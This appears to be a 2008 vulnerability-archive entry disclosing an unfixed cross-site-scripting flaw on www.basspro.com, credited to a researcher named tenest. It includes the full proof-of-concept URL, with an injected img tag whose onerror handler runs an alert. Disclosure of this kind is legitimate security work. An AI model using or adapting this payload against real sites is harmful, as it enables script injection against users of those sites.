Security researcher tenest, has submitted on 13/06/2008 a cross-site-scripting (XSS) vulnerability affecting www.basspro.com, which at the time of submission ranked 8497 on the web according to Alexa.
We manually validated and published a mirror of this vulnerability on 08/07/2008. It is currently unfixed.
If you believe that this security issue has been corrected, please send us an e-mail. |
Date submitted: 13/06/2008 |
Date published: 08/07/2008 |
Fixed? Mail us! | Status: UNFIXED |
Author: tenest |
Domain: www.basspro.com |
Category: XSS |
Pagerank: 8497 |
URL: http://www.basspro.com/webapp/wcs/stores/servlet/SearchResults?hvarSearchString=-+-+%3E+%3C+img+src+ %3D+loo+.+pnt+terror+%3D+alert+%28+1+%29+%2F+%3E+%3C+%21+-+-&catalogId=10001&redirect=spell_suggeste d-%5E--%3E%0A%3Cimg+src%3Dfoo.png+onerror%3Dalert%28'xssed'%29+%2F%3E%0A%3C%21--&langId=-1&ts=Fri+Ju n+13+15%3A46%3A38+CDT+2008&y=0&x=0&storeId=10151&CMID=TOP_SEARCH_GO&searchOption=products |
Click here to view the mirror
|
|
|